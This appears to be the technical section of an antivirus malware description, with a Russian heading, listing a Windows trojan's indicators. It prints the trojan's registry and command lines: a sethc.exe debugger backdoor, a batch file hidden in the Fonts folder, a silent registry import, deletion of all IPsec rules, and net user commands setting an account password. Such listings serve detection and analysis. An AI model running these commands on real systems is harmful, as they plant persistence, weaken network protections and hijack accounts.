Техническая информация
- [<HKLM>\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe] 'debugger' = 'taskmgr.exe'
- %WINDIR%\Fonts\start.bat
- ClassName: 'RegEdit_RegEdit' WindowName: ''
- ClassName: 'EDIT' WindowName: ''
- '<SYSTEM32>\reg.exe' add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /v debugger /t REG_SZ /d "taskmgr.exe" /f
- '%WINDIR%\regedit.exe' /s %WINDIR%\temp\1.reg
- '<SYSTEM32>\netsh.exe' ipsec static delete all
- '<SYSTEM32>\cmd.exe' /c ""%WINDIR%\Fonts\start.bat" "
- '<SYSTEM32>\net.exe' user ASP.USER ninos@zxczxc!123 /y
- '<SYSTEM32>\net1.exe' user ASP.USER ninos@zxczxc!123 /y